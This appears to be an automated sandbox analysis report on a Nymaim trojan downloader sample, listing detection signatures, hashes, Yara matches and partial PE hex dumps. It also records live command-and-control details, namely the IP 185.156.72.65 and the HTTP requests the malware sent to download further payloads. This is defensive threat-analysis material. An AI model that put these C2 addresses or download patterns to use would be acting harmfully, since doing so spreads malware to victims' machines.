Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565534
MD5: 9d2eed099096486e2ae388b2b220497c
SHA1: c84457bca7db83641fd56925c6496b4c9a8c6c5b
SHA256: 5d5a9d7c44e0dbd125b577319dcad5274121c38b6cde03658eb83c49e316d307
Tags: exeuser-Bitsight
Infos:

Detection

Nymaim
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Nymaim
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Nymaim Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim

AV Detection

barindex
Source: 1.2.file.exe.400000.0.unpack Malware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exe ReversingLabs: Detection: 75%
Source: file.exe ReversingLabs: Detection: 31%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004035D0 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey, 1_2_004035D0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_04933837 CryptAcquireContextW,CryptCreateHash,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey, 1_2_04933837
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00417727 FindFirstFileExW, 1_2_00417727
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_10007EA9 FindFirstFileExW, 1_2_10007EA9
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0494798E FindFirstFileExW, 1_2_0494798E

Networking

barindex
Source: Malware configuration extractor IPs: 185.156.72.65
Source: Malware configuration extractor IPs: 185.156.72.65
Source: Malware configuration extractor IPs: 185.156.72.65
Source: Malware configuration extractor IPs: 185.156.72.65
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 30 Nov 2024 04:35:53 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=86Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 02
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 30 Nov 2024 04:35:54 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=85Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
Source: Joe Sandbox View IP Address: 185.156.72.65 185.156.72.65
Source: Joe Sandbox View ASN Name: ITDELUXE-ASRU ITDELUXE-ASRU
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: unknown TCP traffic detected without corresponding DNS query: 185.156.72.65
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00401970 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance, 1_2_00401970
Source: global traffic HTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 185.156.72.65Connection: Keep-AliveCache-Control: no-cache
Source: file.exe, 00000001.00000002.2024454401.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
Source: file.exe, 00000001.00000002.2024454401.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/dll/download
Source: file.exe, 00000001.00000002.2024454401.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/dll/key
Source: file.exe, 00000001.00000002.2024454401.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2024454401.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/files/download
Source: file.exe, 00000001.00000002.2024454401.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2024454401.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.156.72.65/soft/download
Source: Amcache.hve.14.dr String found in binary or memory: http://upx.sf.net
Source: file.exe, 00000001.00000003.1710735382.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712604425.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712500901.00000000054DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711758033.00000000054F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710791389.0000000005305000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711870738.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710832286.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1733155635.0000000005497000.00000004.00000020.00020000.00000000.sdmp, soft[1].1.dr, Y-Cleaner.exe.1.dr String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: file.exe, 00000001.00000003.1710735382.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712604425.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712500901.00000000054DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711758033.00000000054F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710791389.0000000005305000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711870738.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710832286.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1733155635.0000000005497000.00000004.00000020.00020000.00000000.sdmp, soft[1].1.dr, Y-Cleaner.exe.1.dr String found in binary or memory: https://g-cleanit.hk
Source: file.exe, 00000001.00000003.1710735382.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712604425.0000000005581000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1712500901.00000000054DA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711758033.00000000054F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710791389.0000000005305000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1711870738.0000000005497000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1710832286.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1733155635.0000000005497000.00000004.00000020.00020000.00000000.sdmp, soft[1].1.dr, Y-Cleaner.exe.1.dr String found in binary or memory: https://iplogger.org/1Pz8p7

E-Banking Fraud

barindex
Source: Yara match File source: 1.2.file.exe.4930e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.file.exe.4a20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2023817438.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1309173402.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: 00000001.00000002.2025597799.0000000004780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000001.00000002.2025683755.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00403D40 1_2_00403D40
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00402EE0 1_2_00402EE0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00404F70 1_2_00404F70
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00410940 1_2_00410940
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0041A346 1_2_0041A346
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040EBC7 1_2_0040EBC7
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00415E59 1_2_00415E59
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040B6D0 1_2_0040B6D0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040EF09 1_2_0040EF09
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0041572E 1_2_0041572E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_1000E184 1_2_1000E184
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_100102A0 1_2_100102A0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00601846 1_2_00601846
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005DA074 1_2_005DA074
